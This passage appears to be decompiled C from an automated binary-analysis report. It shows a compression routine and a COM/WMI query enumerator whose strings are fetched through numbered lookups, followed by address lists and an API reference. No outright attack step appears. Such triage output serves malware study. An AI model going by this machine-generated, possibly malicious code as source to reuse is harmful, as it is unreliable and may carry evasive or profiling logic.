                                                                                                                                                                                              									_t121 = _t403 + 2; // 0xfed1e902
                                                                                                                                                                                              									_t275 = _t121;
                                                                                                                                                                                              									goto L28;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									_t394 = _t388 + 0xfffffffd;
                                                                                                                                                                                              									_t105 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                              									_t248 = _t394 << _t403 | _t363;
                                                                                                                                                                                              									_t106 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                              									 *(_t223 + 0x16b8) = _t248;
                                                                                                                                                                                              									 *( *_t106 +  *_t105) = _t248;
                                                                                                                                                                                              									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                              									_t111 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                              									_t112 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                              									_t113 = _t223 + 0x16b9; // 0x105
                                                                                                                                                                                              									 *((char*)( *_t111 +  *_t112)) =  *_t113;
                                                                                                                                                                                              									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                              									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
                                                                                                                                                                                              									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                                              									goto L35;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t316 = _t223 + (_t235 + 0x29f) * 4;
                                                                                                                                                                                              								_v28 = _t316;
                                                                                                                                                                                              								do {
                                                                                                                                                                                              									_t378 = _a12;
                                                                                                                                                                                              									_t22 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                                              									_t409 =  *_t22;
                                                                                                                                                                                              									_t24 = _t378 * 4; // 0x59000000
                                                                                                                                                                                              									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
                                                                                                                                                                                              									_t379 =  *_t316 & 0x0000ffff;
                                                                                                                                                                                              									_v24 = _t379;
                                                                                                                                                                                              									_t27 = _t223 + 0x16b8; // 0x105bb
                                                                                                                                                                                              									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
                                                                                                                                                                                              									_v20 = _t382;
                                                                                                                                                                                              									if(_t409 <= 0x10 - _t250) {
                                                                                                                                                                                              										_t321 = _t409 + _t250;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										_t29 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                              										 *(_t223 + 0x16b8) = _t382;
                                                                                                                                                                                              										_t31 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                              										 *((char*)( *_t31 +  *_t29)) = _v20;
                                                                                                                                                                                              										_t223 = _a4;
                                                                                                                                                                                              										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                              										_t37 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                              										_t38 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                              										_t39 = _t223 + 0x16b9; // 0x105
                                                                                                                                                                                              										 *((char*)( *_t37 +  *_t38)) =  *_t39;
                                                                                                                                                                                              										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                              										_t382 = _v24 >> 0x10;
                                                                                                                                                                                              										_t45 = _t223 + 0x16bc; // 0xfed1e900
                                                                                                                                                                                              										_t321 =  *_t45 + 0xfffffff0 + _t250;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									 *(_t223 + 0x16bc) = _t321;
                                                                                                                                                                                              									_t316 = _v28;
                                                                                                                                                                                              									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
                                                                                                                                                                                              									_t388 = _t388 - 1;
                                                                                                                                                                                              								} while (_t388 != 0);
                                                                                                                                                                                              								L35:
                                                                                                                                                                                              								_t235 = _v8;
                                                                                                                                                                                              								_t388 = 0;
                                                                                                                                                                                              								_t398 = _a12;
                                                                                                                                                                                              								if(_t235 != 0) {
                                                                                                                                                                                              									if(_a8 != _t235) {
                                                                                                                                                                                              										_t329 = 7;
                                                                                                                                                                                              										_t217 = _t329 - 3; // 0x4
                                                                                                                                                                                              										_t254 = _t217;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										_t329 = 6;
                                                                                                                                                                                              										_t216 = _t329 - 3; // 0x3
                                                                                                                                                                                              										_t254 = _t216;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									_t329 = 0x8a;
                                                                                                                                                                                              									_t214 = _t388 + 3; // 0x3
                                                                                                                                                                                              									_t254 = _t214;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								goto L41;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t223 = _a4;
                                                                                                                                                                                              						if(_t235 == _v8) {
                                                                                                                                                                                              							_t235 = _v8;
                                                                                                                                                                                              							goto L41;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                              						L41:
                                                                                                                                                                                              						_v12 =  &(_v12[2]);
                                                                                                                                                                                              						_t221 =  &_v16;
                                                                                                                                                                                              						 *_t221 = _v16 - 1;
                                                                                                                                                                                              					} while ( *_t221 != 0);
                                                                                                                                                                                              					goto L42;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}

                                                                                                                                                                                              0x049a85e8
                                                                                                                                                                                              0x049a85ee
                                                                                                                                                                                              0x049a85f6
                                                                                                                                                                                              0x049a8603
                                                                                                                                                                                              0x049a858e
                                                                                                                                                                                              0x049a858e
                                                                                                                                                                                              0x049a8599
                                                                                                                                                                                              0x049a859c
                                                                                                                                                                                              0x049a859f
                                                                                                                                                                                              0x049a85a2
                                                                                                                                                                                              0x049a85a9
                                                                                                                                                                                              0x049a85ac
                                                                                                                                                                                              0x049a85af
                                                                                                                                                                                              0x049a85b2
                                                                                                                                                                                              0x049a85b5
                                                                                                                                                                                              0x049a85bb
                                                                                                                                                                                              0x049a85c7
                                                                                                                                                                                              0x049a85cc
                                                                                                                                                                                              0x049a85d9
                                                                                                                                                                                              0x049a85d9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a858c
                                                                                                                                                                                              0x049a836a
                                                                                                                                                                                              0x049a836f
                                                                                                                                                                                              0x049a8375
                                                                                                                                                                                              0x049a8375
                                                                                                                                                                                              0x049a837d
                                                                                                                                                                                              0x049a837d
                                                                                                                                                                                              0x049a8385
                                                                                                                                                                                              0x049a8385
                                                                                                                                                                                              0x049a838d
                                                                                                                                                                                              0x049a839a
                                                                                                                                                                                              0x049a83a3
                                                                                                                                                                                              0x049a83a8
                                                                                                                                                                                              0x049a83ed
                                                                                                                                                                                              0x049a83ef
                                                                                                                                                                                              0x049a83aa
                                                                                                                                                                                              0x049a83aa
                                                                                                                                                                                              0x049a83ad
                                                                                                                                                                                              0x049a83b0
                                                                                                                                                                                              0x049a83b7
                                                                                                                                                                                              0x049a83ba
                                                                                                                                                                                              0x049a83bd
                                                                                                                                                                                              0x049a83c0
                                                                                                                                                                                              0x049a83c3
                                                                                                                                                                                              0x049a83c9
                                                                                                                                                                                              0x049a83d7
                                                                                                                                                                                              0x049a83dd
                                                                                                                                                                                              0x049a83e6
                                                                                                                                                                                              0x049a83e9
                                                                                                                                                                                              0x049a83e9
                                                                                                                                                                                              0x049a83f2
                                                                                                                                                                                              0x049a83f5
                                                                                                                                                                                              0x049a83fb
                                                                                                                                                                                              0x049a83fb
                                                                                                                                                                                              0x049a8402
                                                                                                                                                                                              0x049a8402
                                                                                                                                                                                              0x049a8409
                                                                                                                                                                                              0x049a8409
                                                                                                                                                                                              0x049a8411
                                                                                                                                                                                              0x049a8411
                                                                                                                                                                                              0x049a8418
                                                                                                                                                                                              0x049a8425
                                                                                                                                                                                              0x049a842e
                                                                                                                                                                                              0x049a8431
                                                                                                                                                                                              0x049a8436
                                                                                                                                                                                              0x049a8438
                                                                                                                                                                                              0x049a843b
                                                                                                                                                                                              0x049a8442
                                                                                                                                                                                              0x049a8448
                                                                                                                                                                                              0x049a844b
                                                                                                                                                                                              0x049a844e
                                                                                                                                                                                              0x049a8451
                                                                                                                                                                                              0x049a8454
                                                                                                                                                                                              0x049a8457
                                                                                                                                                                                              0x049a845d
                                                                                                                                                                                              0x049a846b
                                                                                                                                                                                              0x049a8471
                                                                                                                                                                                              0x049a8474
                                                                                                                                                                                              0x049a8477
                                                                                                                                                                                              0x049a8477
                                                                                                                                                                                              0x049a847a
                                                                                                                                                                                              0x049a847c
                                                                                                                                                                                              0x049a847f
                                                                                                                                                                                              0x049a8485
                                                                                                                                                                                              0x049a848c
                                                                                                                                                                                              0x049a8492
                                                                                                                                                                                              0x049a84eb
                                                                                                                                                                                              0x049a84eb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a8494
                                                                                                                                                                                              0x049a8494
                                                                                                                                                                                              0x049a849f
                                                                                                                                                                                              0x049a84a2
                                                                                                                                                                                              0x049a84a5
                                                                                                                                                                                              0x049a84a8
                                                                                                                                                                                              0x049a84af
                                                                                                                                                                                              0x049a84b2
                                                                                                                                                                                              0x049a84b5
                                                                                                                                                                                              0x049a84b8
                                                                                                                                                                                              0x049a84bb
                                                                                                                                                                                              0x049a84c1
                                                                                                                                                                                              0x049a84cd
                                                                                                                                                                                              0x049a84d2
                                                                                                                                                                                              0x049a84df
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a84df
                                                                                                                                                                                              0x049a82b4
                                                                                                                                                                                              0x049a82ba
                                                                                                                                                                                              0x049a82bd
                                                                                                                                                                                              0x049a82c0
                                                                                                                                                                                              0x049a82c0
                                                                                                                                                                                              0x049a82c3
                                                                                                                                                                                              0x049a82c3
                                                                                                                                                                                              0x049a82c9
                                                                                                                                                                                              0x049a82c9
                                                                                                                                                                                              0x049a82d1
                                                                                                                                                                                              0x049a82d6
                                                                                                                                                                                              0x049a82e3
                                                                                                                                                                                              0x049a82ec
                                                                                                                                                                                              0x049a82ef
                                                                                                                                                                                              0x049a82f4
                                                                                                                                                                                              0x049a833c
                                                                                                                                                                                              0x049a82f6
                                                                                                                                                                                              0x049a82f6
                                                                                                                                                                                              0x049a82f9
                                                                                                                                                                                              0x049a8300
                                                                                                                                                                                              0x049a8306
                                                                                                                                                                                              0x049a8309
                                                                                                                                                                                              0x049a830c
                                                                                                                                                                                              0x049a830f
                                                                                                                                                                                              0x049a8312
                                                                                                                                                                                              0x049a8315
                                                                                                                                                                                              0x049a831b
                                                                                                                                                                                              0x049a8329
                                                                                                                                                                                              0x049a832c
                                                                                                                                                                                              0x049a832f
                                                                                                                                                                                              0x049a8338
                                                                                                                                                                                              0x049a8338
                                                                                                                                                                                              0x049a8342
                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E0499EA4A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                              				signed int _v32;
                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                              				signed int _v60;
                                                                                                                                                                                              				char* _v72;
                                                                                                                                                                                              				signed short _v80;
                                                                                                                                                                                              				signed int _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				char _v96;
                                                                                                                                                                                              				intOrPtr _v100;
                                                                                                                                                                                              				char _v104;
                                                                                                                                                                                              				char _v616;
                                                                                                                                                                                              				intOrPtr* _t159;
                                                                                                                                                                                              				char _t165;
                                                                                                                                                                                              				signed int _t166;
                                                                                                                                                                                              				signed int _t173;
                                                                                                                                                                                              				signed int _t178;
                                                                                                                                                                                              				signed int _t186;
                                                                                                                                                                                              				intOrPtr* _t187;
                                                                                                                                                                                              				signed int _t188;
                                                                                                                                                                                              				signed int _t192;
                                                                                                                                                                                              				intOrPtr* _t193;
                                                                                                                                                                                              				intOrPtr _t200;
                                                                                                                                                                                              				intOrPtr* _t205;
                                                                                                                                                                                              				signed int _t207;
                                                                                                                                                                                              				signed int _t209;
                                                                                                                                                                                              				intOrPtr* _t210;
                                                                                                                                                                                              				intOrPtr _t212;
                                                                                                                                                                                              				intOrPtr* _t213;
                                                                                                                                                                                              				signed int _t214;
                                                                                                                                                                                              				char _t217;
                                                                                                                                                                                              				signed int _t218;
                                                                                                                                                                                              				signed int _t219;
                                                                                                                                                                                              				signed int _t230;
                                                                                                                                                                                              				signed int _t235;
                                                                                                                                                                                              				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0499E400(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E04998BDE(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E04998BF4( &_v60, 0xfffffffe);
					E0499E4B4( &_v104);
					return _t320;
				}
				_t165 = E04999DF2(_t255, 0x3a7);
				 *_t328 = 0xae7;
				_v52 = _t165;
				_t166 = E04999DF2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E04999A5A(_t165);
				_v60 = _t322;
				E04998BAF( &_v52);
				E04998BAF( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E04999DF2(_t255, 0x886);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E04998BAF( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E04998BF4( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E049998BD(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E049998BD(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E04998C72(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E04998BDE( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E04998BF4(_t136, 0);
								E04998BF4( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E049998BD(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E04999DF2(_t281, 0xb28);
								 *_t329 = 0x83f;
                                                                                                                                                                                              								_t217 = E04999DF2(_t281);
                                                                                                                                                                                              								_t283 = _v80;
                                                                                                                                                                                              								_v96 = _t217;
                                                                                                                                                                                              								_t218 = _t283 & 0x0000ffff;
                                                                                                                                                                                              								__eflags = _t218 - 0xb;
                                                                                                                                                                                              								if(__eflags > 0) {
                                                                                                                                                                                              									_t219 = _t218 - 0x10;
                                                                                                                                                                                              									__eflags = _t219;
                                                                                                                                                                                              									if(_t219 == 0) {
                                                                                                                                                                                              										L35:
                                                                                                                                                                                              										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E04998BDE(0x18);
                                                                                                                                                                                              										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                                              										__eflags = _t289;
                                                                                                                                                                                              										if(_t289 == 0) {
                                                                                                                                                                                              											L38:
                                                                                                                                                                                              											E04998BAF( &_v92);
                                                                                                                                                                                              											E04998BAF( &_v96);
                                                                                                                                                                                              											__imp__#9( &_v80);
                                                                                                                                                                                              											goto L39;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_push(_v72);
                                                                                                                                                                                              										_push(L"%d");
                                                                                                                                                                                              										L37:
                                                                                                                                                                                              										_push(0xc);
                                                                                                                                                                                              										_push(_t289);
                                                                                                                                                                                              										E04999E51();
                                                                                                                                                                                              										_t329 = _t329 + 0x10;
                                                                                                                                                                                              										goto L38;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t230 = _t219 - 1;
                                                                                                                                                                                              									__eflags = _t230;
                                                                                                                                                                                              									if(_t230 == 0) {
                                                                                                                                                                                              										L33:
                                                                                                                                                                                              										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E04998BDE(0x18);
                                                                                                                                                                                              										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                                              										__eflags = _t289;
                                                                                                                                                                                              										if(_t289 == 0) {
                                                                                                                                                                                              											goto L38;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_push(_v72);
                                                                                                                                                                                              										_push(L"%u");
                                                                                                                                                                                              										goto L37;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t235 = _t230 - 1;
                                                                                                                                                                                              									__eflags = _t235;
                                                                                                                                                                                              									if(_t235 == 0) {
                                                                                                                                                                                              										goto L33;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									__eflags = _t235 == 1;
                                                                                                                                                                                              									if(_t235 == 1) {
                                                                                                                                                                                              										goto L33;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									L28:
                                                                                                                                                                                              									__eflags = _t283 & 0x00002000;
                                                                                                                                                                                              									if((_t283 & 0x00002000) == 0) {
                                                                                                                                                                                              										_v88 = E04999DF2(_t283, 0xe0a);
                                                                                                                                                                                              										E04999E51( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                                                                                                                                                                              										E04998BAF( &_v88);
                                                                                                                                                                                              										_t329 = _t329 + 0x18;
                                                                                                                                                                                              										_t298 =  &_v616;
                                                                                                                                                                                              										L31:
                                                                                                                                                                                              										_t242 = E049998BD(_t298);
                                                                                                                                                                                              										L32:
                                                                                                                                                                                              										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                                                                                                                                                                              										goto L38;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t242 = E0499E92E( &_v80);
                                                                                                                                                                                              									goto L32;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                                                              									__eflags = _v72 - 0xffff;
                                                                                                                                                                                              									_t298 = L"TRUE";
                                                                                                                                                                                              									if(_v72 != 0xffff) {
                                                                                                                                                                                              										_t298 = L"FALSE";
                                                                                                                                                                                              									}
                                                                                                                                                                                              									goto L31;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t243 = _t218 - 1;
                                                                                                                                                                                              								__eflags = _t243;
                                                                                                                                                                                              								if(_t243 == 0) {
                                                                                                                                                                                              									goto L38;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t244 = _t243 - 1;
                                                                                                                                                                                              								__eflags = _t244;
                                                                                                                                                                                              								if(_t244 == 0) {
                                                                                                                                                                                              									goto L35;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t245 = _t244 - 1;
                                                                                                                                                                                              								__eflags = _t245;
                                                                                                                                                                                              								if(_t245 == 0) {
                                                                                                                                                                                              									goto L35;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								__eflags = _t245 != 5;
                                                                                                                                                                                              								if(_t245 != 5) {
                                                                                                                                                                                              									goto L28;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t298 = _v72;
                                                                                                                                                                                              								goto L31;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__imp__#16(_v24);
                                                                                                                                                                                              							_t210 = _v28;
                                                                                                                                                                                              							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                                                                                                                                                                              							_t252 = _v20;
                                                                                                                                                                                              							L42:
                                                                                                                                                                                              							_t262 = _v32;
                                                                                                                                                                                              							_t252 = _t252 + 1;
                                                                                                                                                                                              							_v20 = _t252;
                                                                                                                                                                                              							__eflags = _t262;
                                                                                                                                                                                              							if(_t262 != 0) {
                                                                                                                                                                                              								continue;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							L48:
                                                                                                                                                                                              							_t324 = _v40;
                                                                                                                                                                                              							goto L49;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t247 = _v28;
                                                                                                                                                                                              						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                                                                                                                                                                              						goto L42;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t262 = _v32;
                                                                                                                                                                                              					goto L48;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					E04998BF4( &_v36, _t322);
                                                                                                                                                                                              					_t320 = _v36;
                                                                                                                                                                                              					goto L53;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}





































































                                                                                                                                                                                              0x0499eaa8
                                                                                                                                                                                              0x0499eaaa
                                                                                                                                                                                              0x0499eaad
                                                                                                                                                                                              0x0499eab0
                                                                                                                                                                                              0x0499eab1
                                                                                                                                                                                              0x0499eaba
                                                                                                                                                                                              0x0499eac0
                                                                                                                                                                                              0x0499eac3
                                                                                                                                                                                              0x0499eacc
                                                                                                                                                                                              0x0499ead1
                                                                                                                                                                                              0x0499ead6
                                                                                                                                                                                              0x0499eaed
                                                                                                                                                                                              0x0499eafa
                                                                                                                                                                                              0x0499eafd
                                                                                                                                                                                              0x0499eb04
                                                                                                                                                                                              0x0499eb09
                                                                                                                                                                                              0x0499eb10
                                                                                                                                                                                              0x0499eb15
                                                                                                                                                                                              0x0499eb1c
                                                                                                                                                                                              0x0499eb1e
                                                                                                                                                                                              0x0499eb2a
                                                                                                                                                                                              0x0499eb2d
                                                                                                                                                                                              0x0499eb2f
                                                                                                                                                                                              0x0499ee8f
                                                                                                                                                                                              0x0499ee90
                                                                                                                                                                                              0x0499ee99
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ee99
                                                                                                                                                                                              0x0499eb35
                                                                                                                                                                                              0x0499eb38
                                                                                                                                                                                              0x0499eb3b
                                                                                                                                                                                              0x0499eb3e
                                                                                                                                                                                              0x0499eb40
                                                                                                                                                                                              0x0499ee5b
                                                                                                                                                                                              0x0499ee5e
                                                                                                                                                                                              0x0499ee61
                                                                                                                                                                                              0x0499ee63
                                                                                                                                                                                              0x0499ee85
                                                                                                                                                                                              0x0499ee8a
                                                                                                                                                                                              0x0499ee65
                                                                                                                                                                                              0x0499ee68
                                                                                                                                                                                              0x0499ee73
                                                                                                                                                                                              0x0499ee7a
                                                                                                                                                                                              0x0499ee7a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499eb46
                                                                                                                                                                                              0x0499eb46
                                                                                                                                                                                              0x0499eb58
                                                                                                                                                                                              0x0499eb5b
                                                                                                                                                                                              0x0499eb5d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499eb65
                                                                                                                                                                                              0x0499eb68
                                                                                                                                                                                              0x0499eb6b
                                                                                                                                                                                              0x0499eb6e
                                                                                                                                                                                              0x0499eb71
                                                                                                                                                                                              0x0499eb74
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499eb7a
                                                                                                                                                                                              0x0499eb88
                                                                                                                                                                                              0x0499eb8b
                                                                                                                                                                                              0x0499eb8d
                                                                                                                                                                                              0x0499eba6
                                                                                                                                                                                              0x0499ebb5
                                                                                                                                                                                              0x0499ebbd
                                                                                                                                                                                              0x0499ebbd
                                                                                                                                                                                              0x0499ebc0
                                                                                                                                                                                              0x0499ebc7
                                                                                                                                                                                              0x0499ebcb
                                                                                                                                                                                              0x0499ebd1
                                                                                                                                                                                              0x0499ebd3
                                                                                                                                                                                              0x0499ee43
                                                                                                                                                                                              0x0499ee49
                                                                                                                                                                                              0x0499ee4f
                                                                                                                                                                                              0x0499ee52
                                                                                                                                                                                              0x0499ee52
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ee52
                                                                                                                                                                                              0x0499ebe2
                                                                                                                                                                                              0x0499ebf6
                                                                                                                                                                                              0x0499ebfa
                                                                                                                                                                                              0x0499ebfc
                                                                                                                                                                                              0x0499ec01
                                                                                                                                                                                              0x0499ee10
                                                                                                                                                                                              0x0499ee16
                                                                                                                                                                                              0x0499ee21
                                                                                                                                                                                              0x0499ee2c
                                                                                                                                                                                              0x0499ee32
                                                                                                                                                                                              0x0499ee38
                                                                                                                                                                                              0x0499ee3b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ee3b
                                                                                                                                                                                              0x0499ec07
                                                                                                                                                                                              0x0499edde
                                                                                                                                                                                              0x0499edde
                                                                                                                                                                                              0x0499ede1
                                                                                                                                                                                              0x0499ede4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ec0f
                                                                                                                                                                                              0x0499ec17
                                                                                                                                                                                              0x0499ec1e
                                                                                                                                                                                              0x0499ec24
                                                                                                                                                                                              0x0499ec26
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499ec2f
                                                                                                                                                                                              0x0499ec44
                                                                                                                                                                                              0x0499ec4a
                                                                                                                                                                                              0x0499ec53
                                                                                                                                                                                              0x0499ec56
                                                                                                                                                                                              0x0499ec59
                                                                                                                                                                                              0x0499ec5b
                                                                                                                                                                                              0x0499edd1
                                                                                                                                                                                              0x0499edd4
                                                                                                                                                                                              0x0499eddd
                                                                                                                                                                                              0x0499eddd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499eddd
                                                                                                                                                                                              0x0499ec6b
                                                                                                                                                                                              0x0499ec6e
                                                                                                                                                                                              0x0499ec75
                                                                                                                                                                                              0x0499ec7b
                                                                                                                                                                                              0x0499ec7e
                                                                                                                                                                                              0x0499ec81
                                                                                                                                                                                              0x0499ec84
                                                                                                                                                                                              0x0499ec87
                                                                                                                                                                                              0x0499ecc3
                                                                                                                                                                                              0x0499ecc3
                                                                                                                                                                                              0x0499ecc6
                                                                                                                                                                                              0x0499ed72
                                                                                                                                                                                              0x0499ed86
                                                                                                                                                                                              0x0499ed96
                                                                                                                                                                                              0x0499ed9a
                                                                                                                                                                                              0x0499ed9c

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0499E400: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,0499E731,000009DA,00000000,?,00000000), ref: 0499E413
